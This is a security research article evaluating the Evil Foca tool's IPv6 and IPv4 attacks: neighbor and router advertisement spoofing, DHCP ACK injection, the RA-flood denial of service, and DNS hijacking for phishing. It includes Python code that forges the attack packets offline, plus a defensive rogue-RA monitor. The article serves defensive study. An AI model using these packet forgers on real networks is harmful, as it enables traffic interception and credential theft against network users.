Evil Foca: An attack tool targeting IPv4 and IPv6 networks
As part of Intrinsec's research activities on IPv6 security, we tested the features of Evil Foca. This article examines the implemented attacks and their relevance. Evil Foca is a tool designed by Informatica64 to test the security level of IPv4 and IPv6 networks. The Alpha version, released on April 6, 2013, implements three types of attack: Man in the middle, denial of service and DNS hijacking.
Network scan:
When the tool is launched, the user chooses the network interface that will be used to send the packets. By default, it discovers hosts with ICMPv6 Echo Request messages (type 128) sent to the multicast addresses ff01::1, ff02::1, ff01::2 and ff02::2 (the interface-local and link-local all-nodes and all-routers groups), as illustrated in the network screenshot below.
At this stage, the tool collects the replies from the live machines, then sends an ICMPv6 Neighbor Solicitation to each of them to learn its MAC address. Once the Neighbor Advertisements are received, Evil Foca sends an ICMPv6 Parameter Problem message (type 4) with the code field set to 0 to every machine that answered the Echo Request sent during the scan. Note that RFC 2463 section 3.4 defines code 0 as "erroneous header field encountered"; "unrecognized Next Header type encountered" is code 1. As the purpose of this packet is unclear, we contacted the tool's developers regarding its function. Having received no response so far, this point will be updated later. Finally, the discovery process is repeated every 60 seconds.
Evil Foca can also scan with Router Advertisement packets sent to the multicast address ff02::1, which every IPv6 node on the link must listen to in order to receive information from routers. A closer look at the packet sent by Evil Foca shows that the M and O flags are cleared, so clients are told not to request any configuration from a DHCPv6 server, while the Router Preference field (RFC 4191) is set to High, positioning the attacker's machine as the preferred default router, as shown in the following screenshot.
The user can choose the type of scan they wish to perform by changing the option in the configuration (setting) menu.
Man in the middle:
Evil Foca implements the Man in the middle attack for both IPv6 and IPv4 network stacks, using several exploitation methods.
For IPv6 networks:
To perform a Man-in-the-Middle attack on IPv6 networks, Evil Foca proposes three methods. The first is to use "Neighbor Advertisement Spoofing," which involves sending malicious "Neighbor Advertisement" messages to modify the "Neighbor Cache" of target machines. The second method uses "Router Advertisement" messages to position the attacker as a router, causing traffic from all targets to be redirected to the attacker. The final method employs a malicious DHCPv6 server that broadcasts false addressing information.
Scenario:
Consider the following network diagram:
Suppose an attacker manages to connect to the network and launches the tool. Upon launch, Evil Foca will perform a network scan and display the results. Before the attack is launched, the target machine's "Neighbor cache" contains only one record: that of the router.
To launch the attack, simply add the targets and then click the Start button. Depending on the method used, the tool will begin sending malicious packets to corrupt the target's cache.
After the attack was launched, the target machine's cache was indeed modified: it now contained the IPv6 addresses of both the legitimate router and the attacker's router, and both entries carried the same MAC address, that of the attacker's machine, as illustrated below.
At this stage, we should be receiving the packets to and from the target machine. However, during the discovery phase Evil Foca only found the link-local addresses, and those are the only addresses used to corrupt the caches of the target and of the router. Since a machine on an IPv6 network normally has several addresses, including global ones, and traffic leaving the link uses a global source address, only communications using link-local addresses are intercepted. This is a major drawback of the tool. To work around it, the global addresses can be collected with another tool, such as Nmap (version 6.0 or higher), which handles the collection of global addresses well, and then added to the target list by hand.
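The following is an added example (not Evil Foca's code) that assembles the two ICMPv6 messages the scan and the IPv6 man-in-the-middle above depend on: the Router Advertisement with the M and O flags cleared and Router Preference set to High, and the unsolicited Neighbor Advertisement with the Override flag that rewrites a neighbor cache entry. The addresses, MACs and prefix are constructed lab values, and mitm_packets shows why every address of the victim, global ones included, needs its own spoofed advertisement.

```python
"""Build the ICMPv6 Router Advertisement and Neighbor Advertisement messages
used by an RA-based scan and by Neighbor Advertisement spoofing.
Added example: packets are assembled with struct so the field layout is
visible; nothing is sent on the wire, so it runs offline."""
import ipaddress
import struct

ALL_NODES = "ff02::1"

# Constructed lab values (assumptions for the example, not from the article).
ATTACKER_LL = "fe80::1"
ATTACKER_MAC = "02:00:00:00:aa:01"


def _mac(mac):
    return bytes.fromhex(mac.replace(":", ""))


def icmpv6_checksum(src, dst, msg):
    """One's-complement checksum over the IPv6 pseudo-header plus the ICMPv6
    message (RFC 2460 section 8.1). Verifying a correctly checksummed message
    returns 0."""
    pseudo = ipaddress.IPv6Address(src).packed + ipaddress.IPv6Address(dst).packed
    pseudo += struct.pack("!I3xB", len(msg), 58)       # upper-layer length, next header = ICMPv6
    data = pseudo + msg
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def _finish(src, dst, msg):
    """Insert the checksum into bytes 2-3 of a message built with 0 there."""
    return msg[:2] + struct.pack("!H", icmpv6_checksum(src, dst, msg)) + msg[4:]


def build_ra(src_ll, src_mac, prefix="2001:db8:1::/64", router_lifetime=1800,
             managed=False, other=False, prf_high=True):
    """Router Advertisement (type 134) with the settings observed in the scan:
    M and O cleared (clients do not use DHCPv6) and Router Preference High
    (RFC 4191), so the sender wins the default-router choice."""
    flags = (0x80 if managed else 0) | (0x40 if other else 0)
    if prf_high:
        flags |= 0x08                                   # prf bits 4-3 = 01 (High)
    msg = struct.pack("!BBHBBHII", 134, 0, 0, 64, flags, router_lifetime, 0, 0)
    msg += struct.pack("!BB6s", 1, 1, _mac(src_mac))    # Source Link-Layer Address option
    net = ipaddress.IPv6Network(prefix)
    msg += struct.pack("!BBBBIII16s", 3, 4, net.prefixlen, 0xC0,   # Prefix Information, L+A set
                       2592000, 604800, 0, net.network_address.packed)
    return _finish(src_ll, ALL_NODES, msg)


def build_na(src_ll, src_mac, target, dst=ALL_NODES, router=False):
    """Unsolicited Neighbor Advertisement (type 136) claiming `target` is at
    `src_mac`. The Override flag makes the receiver replace an existing cache
    entry (RFC 4861 section 7.2.5). Set `router` when spoofing a router's
    address, otherwise R=0 makes the victim drop it from its Default Router List."""
    flags = (0x80 if router else 0) | 0x20              # R, S=0 (unsolicited), O
    msg = struct.pack("!BBHB3x16s", 136, 0, 0, flags, ipaddress.IPv6Address(target).packed)
    msg += struct.pack("!BB6s", 2, 1, _mac(src_mac))    # Target Link-Layer Address option
    return _finish(src_ll, dst, msg)


def mitm_packets(attacker_ll, attacker_mac, victim_addrs, router_addrs):
    """(destination, NA) pairs poisoning both ends. Each address of each side
    needs its own NA, which is why a scan that sees only link-local addresses
    leaves the victim's global-address traffic unintercepted."""
    pkts = []
    for v in victim_addrs:
        for r in router_addrs:
            # tell the victim that the router address lives at the attacker's MAC
            pkts.append((v, build_na(attacker_ll, attacker_mac, r, dst=v, router=True)))
            # tell the router that the victim address lives at the attacker's MAC
            pkts.append((r, build_na(attacker_ll, attacker_mac, v, dst=r)))
    return pkts
```

To actually transmit these, the bytes would be handed to a raw IPv6 socket or a packet library; the construction above is what matters for understanding which fields the target stacks act on.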
For IPv4 networks:
The Man-in-the-Middle attack implemented by Evil Foca for IPv4 networks uses two exploitation methods. The tool proposes ARP spoofing as the first attack method or performing a "DHCP ACK injection" as illustrated below.
This attack relies on racing the legitimate DHCP server: when the client broadcasts its DHCPREQUEST, the attacker answers with a forged DHCPACK that copies the transaction ID and client hardware address from that broadcast and carries the attacker's choice of gateway and DNS server. The client accepts whichever acknowledgement reaches it first.
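As an added example (not the tool's code), here is the exchange behind DHCP ACK injection: the fields of a constructed DHCPREQUEST that the forged DHCPACK must copy, and the options the attacker sets. The addresses and the client MAC are assumptions, and copying the real server's identifier into the forged ACK is this example's choice, not something the article confirms about Evil Foca.

```python
"""DHCP ACK injection: parse the client's broadcast DHCPREQUEST and forge the
DHCPACK that answers it, pointing the client at an attacker-controlled gateway
and DNS server. Added example built with struct; nothing is transmitted."""
import struct

MAGIC_COOKIE = b"\x63\x82\x53\x63"
DHCPREQUEST, DHCPACK = 3, 5

# Constructed lab values (assumptions for the example).
ATTACKER_IP = b"\xc0\x00\x02\xfe"       # 192.0.2.254
REAL_SERVER_IP = b"\xc0\x00\x02\x01"    # 192.0.2.1
CLIENT_MAC = b"\x02\x00\x00\x00\x00\x42"

FIXED = "!4BIHH4s4s4s4s16s"             # op..hops, xid, secs, flags, ciaddr..giaddr, chaddr


def parse_dhcp(pkt):
    """Fixed fields (RFC 2131 section 2) plus an {option_code: value} dict."""
    (op, htype, hlen, hops, xid, secs, flags,
     ciaddr, yiaddr, siaddr, giaddr, chaddr) = struct.unpack(FIXED, pkt[:44])
    if pkt[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP message: magic cookie missing")
    opts, i = {}, 240
    while i < len(pkt) and pkt[i] != 255:             # 255 = END
        if pkt[i] == 0:                                # 0 = PAD, no length byte
            i += 1
            continue
        code, length = pkt[i], pkt[i + 1]
        opts[code] = pkt[i + 2:i + 2 + length]
        i += 2 + length
    return {"op": op, "htype": htype, "hlen": hlen, "xid": xid, "flags": flags,
            "ciaddr": ciaddr, "yiaddr": yiaddr, "chaddr": chaddr[:hlen], "opts": opts}


def _options(pairs):
    body = b"".join(bytes([code, len(val)]) + val for code, val in pairs)
    return MAGIC_COOKIE + body + b"\xff"


def sample_request(xid=0x3903F326, requested_ip=b"\xc0\x00\x02\x32"):
    """Constructed DHCPREQUEST as a client broadcasts it in the SELECTING state:
    it names the server it chose (option 54) and the address it was offered (option 50)."""
    fixed = struct.pack(FIXED, 1, 1, 6, 0, xid, 0, 0x8000,
                        b"\0" * 4, b"\0" * 4, b"\0" * 4, b"\0" * 4, CLIENT_MAC.ljust(16, b"\0"))
    fixed += b"\0" * 192                               # sname + file, unused
    return fixed + _options([(53, bytes([DHCPREQUEST])), (50, requested_ip),
                             (54, REAL_SERVER_IP), (55, b"\x01\x03\x06")])


def forge_ack(request, router_ip, dns_ip, mask=b"\xff\xff\xff\x00", lease=3600):
    """DHCPACK answering `request`. Everything the client uses to match the reply
    is copied from its own broadcast: xid, chaddr, flags and the requested address.
    The server identifier is copied too, so the forged ACK claims to come from the
    server the client selected (this example's assumption about the technique).
    Returns None for anything that is not a DHCPREQUEST."""
    req = parse_dhcp(request)
    if req["op"] != 1 or req["opts"].get(53) != bytes([DHCPREQUEST]):
        return None
    yiaddr = req["opts"].get(50, req["ciaddr"])        # renewing clients carry the address in ciaddr
    server_id = req["opts"].get(54, router_ip)
    fixed = struct.pack(FIXED, 2, req["htype"], req["hlen"], 0, req["xid"], 0, req["flags"],
                        b"\0" * 4, yiaddr, server_id, b"\0" * 4, req["chaddr"].ljust(16, b"\0"))
    fixed += b"\0" * 192
    ack = fixed + _options([(53, bytes([DHCPACK])), (54, server_id), (51, struct.pack("!I", lease)),
                            (1, mask), (3, router_ip), (6, dns_ip)])
    return ack.ljust(300, b"\0")                       # BOOTP minimum message size
```

Because the client's flags field (broadcast bit) is copied as well, the forged ACK would be sent to 255.255.255.255:68 exactly like the legitimate one, which is what makes the race winnable.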
Denial-of-service attacks:
The denial-of-service attack against hosts with the IPv6 stack enabled targets Windows machines. It exploits a weakness in the Neighbor Discovery Protocol (NDP) implementation, the "RA flood" issue (CVE-2010-4669): Evil Foca sends a large number of Router Advertisement (RA) packets with different source addresses, and processing them consumes all of the target's CPU, rendering the machine unusable. For IPv4 machines, the tool severs the connection between two hosts by poisoning the target's ARP cache with a forged ARP packet.
DNS Hijacking:
Evil Foca allows us to implement a "DNS Hijacking" attack. The principle of this attack is to redirect DNS queries to a malicious DNS server. To carry out this attack, a Man-in-the-Middle attack must be performed beforehand.
Scenario:
We will use the same network diagram as before. To carry out a phishing campaign, an attacker sets up a web server that imitates the authentication page of a well-known site offering an email service, such as Gmail. To redirect users to the malicious site, we use the DNS hijacking attack, which maps the domain name www.gmail.com to the attacker's address, as shown below.
After the attack is launched, when a network user tries to access the domain name www.gmail.com, the IP address sent to the client will be that of the attacker hosting the malicious server.
Finally, the web page is loaded from the malicious web server, and the attacker can retrieve the credentials entered by the user. Note that this only works as long as the victim reaches the page over plain HTTP: for an HTTPS URL the attacker cannot present a valid certificate for the hijacked name, and the browser will warn the user.
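An added example (not the tool's code) of the forged DNS answer the hijack relies on: a query for the hijacked name gets a response carrying the attacker's address and the client's transaction ID, and any other name is left for the real resolver. The hijacked name and the attacker address are constructed values, and the handling of AAAA queries is this example's assumption about what a dual-stack client needs.

```python
"""DNS hijacking: once traffic flows through the attacker, a query for a chosen
name is answered with the attacker's address. Added example with hand-built
DNS messages; nothing is sent on the network."""
import struct

# Constructed values (assumptions for the example).
HIJACK = {"www.gmail.com": b"\xc0\x00\x02\xfe"}        # name -> attacker IPv4 (192.0.2.254)
TYPE_A, TYPE_AAAA, CLASS_IN = 1, 28, 1


def encode_name(name):
    """Wire form of a domain name: length-prefixed labels ending in a zero byte."""
    return b"".join(bytes([len(l)]) + l.encode() for l in name.rstrip(".").split(".")) + b"\x00"


def parse_query(pkt):
    """Return (id, qname, qtype, qclass, question_bytes) of a standard query."""
    qid, flags, qdcount = struct.unpack("!HHH", pkt[:6])
    if flags & 0x8000 or qdcount != 1:
        raise ValueError("not a single-question query")
    labels, i = [], 12
    while pkt[i] != 0:
        n = pkt[i]
        if n & 0xC0:
            raise ValueError("compression pointer in a question name")
        labels.append(pkt[i + 1:i + 1 + n].decode("ascii").lower())
        i += 1 + n
    qtype, qclass = struct.unpack("!HH", pkt[i + 1:i + 5])
    return qid, ".".join(labels), qtype, qclass, pkt[12:i + 5]


def build_query(name, qtype=TYPE_A, qid=0x1234):
    """Constructed client query: ID, RD set, one question."""
    header = struct.pack("!HHHHHH", qid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, CLASS_IN)


def forge_response(query, hijack=HIJACK, ttl=300):
    """Spoofed answer for a hijacked name, or None when the query should simply be
    passed on to the real resolver. An AAAA query for a hijacked name gets an empty
    NOERROR answer so that a dual-stack client falls back to the A record instead of
    reaching the real site over IPv6 (this example's assumption)."""
    qid, qname, qtype, qclass, question = parse_query(query)
    if qclass != CLASS_IN or qname not in hijack or qtype not in (TYPE_A, TYPE_AAAA):
        return None
    answer = b""
    if qtype == TYPE_A:
        # name as a pointer to offset 12 (the question), type A, class IN, TTL, rdlength, rdata
        answer = struct.pack("!HHHIH", 0xC00C, TYPE_A, CLASS_IN, ttl, 4) + hijack[qname]
    header = struct.pack("!HHHHHH", qid, 0x8180, 1, 1 if answer else 0, 0, 0)   # QR, RD, RA
    return header + question + answer
```

The response must reach the client before the genuine one; the preceding man-in-the-middle step is what lets the attacker see the query and drop or delay the real resolver's reply.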
Conclusion
Evil Foca is still under development, which explains its weakness in node detection. The tool does not identify the global addresses of IPv6 machines, which limits the effectiveness of the "Man-in-the-Middle" attack, since the traffic sent to and from those addresses is not intercepted. Evil Foca does contain some interesting attacks, particularly the "Man-in-the-Middle" attack on an IPv6 network, which is not otherwise available in a point-and-click tool. This makes these attacks more accessible and increases the risk of their being carried out.
There are solutions operating at layer 2 that protect against this type of attack. They include open-source tools such as rafixd and NDPMon, which detect rogue Router Advertisements on the link (rafixd also counters them by re-advertising the rogue router with a lifetime of zero), and Cisco's First Hop Security (FHS), whose RA Guard, DHCPv6 Guard and ND inspection features provide comprehensive protection at the switch port.
The final version of Evil Foca is to implement an attack that uses IPv6 to intercept the traffic of an IPv4 network, which will be a real threat to networks with both the IPv6 and the IPv4 stack enabled (for more information on this NAT64/DNS64 attack, refer to the Informatica64 blog). To protect against it, the IPv6 stack must be disabled where it is not in use, or rogue Router Advertisements must be blocked with the layer-2 protections mentioned above.
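The monitoring side, as an added example in the spirit of NDPMon and RA Guard rather than code from either project: each Router Advertisement is decoded and compared with a policy naming the legitimate router's MAC and prefix, and a burst of advertisements from many source addresses, the pattern of the RA-flood denial of service described earlier, is reported. The policy values and the sample packets are constructed, and the monitor does not verify the ICMPv6 checksum.

```python
"""Router Advertisement monitor: decode every RA seen on the link, compare it
with a policy describing the legitimate router, and flag bursts of RAs from
many sources (RA flood). Added example; policy and packets are constructed."""
import ipaddress
import struct
from collections import deque


def parse_ra(msg):
    """Decode an ICMPv6 Router Advertisement (type 134) and its options."""
    typ, _code, _ck, hop_limit, flags, lifetime, _reach, _retrans = struct.unpack("!BBHBBHII", msg[:16])
    if typ != 134:
        raise ValueError("not a Router Advertisement")
    ra = {"hop_limit": hop_limit, "managed": bool(flags & 0x80), "other": bool(flags & 0x40),
          "prf": (flags >> 3) & 0x3, "lifetime": lifetime, "src_mac": None, "prefixes": []}
    i = 16
    while i + 2 <= len(msg):
        otype, olen = msg[i], msg[i + 1] * 8            # option length is in 8-byte units
        if olen == 0:
            raise ValueError("zero-length option")
        body = msg[i + 2:i + olen]
        if otype == 1:                                  # Source Link-Layer Address
            ra["src_mac"] = ":".join("%02x" % b for b in body[:6])
        elif otype == 3:                                # Prefix Information: plen, flags, lifetimes, prefix
            ra["prefixes"].append((body[14:30], body[0]))
        i += olen
    return ra


class RAMonitor:
    def __init__(self, allowed_macs, allowed_prefixes, expect_managed, window=5.0, flood_threshold=20):
        self.allowed_macs = {m.lower() for m in allowed_macs}
        self.allowed_prefixes = set(allowed_prefixes)
        self.expect_managed = expect_managed
        self.window, self.flood_threshold = window, flood_threshold
        self.recent = deque()                           # (timestamp, src_ip) of RAs in the window

    def observe(self, ts, src_ip, src_mac, msg):
        """Return the alerts raised by one RA (empty list = looks legitimate)."""
        ra = parse_ra(msg)
        alerts, mac = [], src_mac.lower()
        if mac not in self.allowed_macs:
            alerts.append(f"rogue RA from unknown MAC {mac} ({src_ip})")
            if ra["prf"] == 1:
                alerts.append("rogue router claims High preference and will win over the real one")
        if ra["src_mac"] and ra["src_mac"] != mac:
            alerts.append(f"source link-layer option {ra['src_mac']} does not match frame source {mac}")
        for prefix, plen in ra["prefixes"]:
            p = f"{ipaddress.IPv6Address(prefix)}/{plen}"
            if p not in self.allowed_prefixes:
                alerts.append(f"unexpected prefix {p}")
        if self.expect_managed and not ra["managed"]:
            alerts.append("M flag cleared: clients would stop using DHCPv6")
        # RA flood: many distinct source addresses inside one short window
        self.recent.append((ts, src_ip))
        while self.recent and ts - self.recent[0][0] > self.window:
            self.recent.popleft()
        sources = {ip for _, ip in self.recent}
        if len(sources) >= self.flood_threshold:
            alerts.append(f"RA flood: {len(self.recent)} RAs from {len(sources)} sources in {self.window}s")
        return alerts


def sample_ra(src_mac, prefix="2001:db8:1::", plen=64, flags=0x08, lifetime=1800):
    """Constructed RA bytes for the demo (checksum left at 0; not verified here)."""
    msg = struct.pack("!BBHBBHII", 134, 0, 0, 64, flags, lifetime, 0, 0)
    msg += struct.pack("!BB6s", 1, 1, bytes.fromhex(src_mac.replace(":", "")))
    msg += struct.pack("!BBBBIII16s", 3, 4, plen, 0xC0, 2592000, 604800, 0,
                       ipaddress.IPv6Address(prefix).packed)
    return msg


def demo():
    """Legitimate RA, one rogue RA, then a flood; returns the three alert lists."""
    mon = RAMonitor(["00:11:22:33:44:55"], ["2001:db8:1::/64"], expect_managed=False)
    legit = mon.observe(0.0, "fe80::1", "00:11:22:33:44:55", sample_ra("00:11:22:33:44:55", flags=0x00))
    rogue = mon.observe(1.0, "fe80::bad", "02:00:00:00:aa:01",
                        sample_ra("02:00:00:00:aa:01", prefix="2001:db8:dead::"))
    flood = []
    for n in range(25):
        flood = mon.observe(2.0 + n * 0.01, f"fe80::{n + 0x100:x}", "02:00:00:00:aa:01",
                            sample_ra("02:00:00:00:aa:01"))
    return legit, rogue, flood
```

In a deployment the frames would come from a capture on the monitored segment, and RA Guard on the access switch would drop them before they reach the hosts; the checks above are the ones such a filter applies.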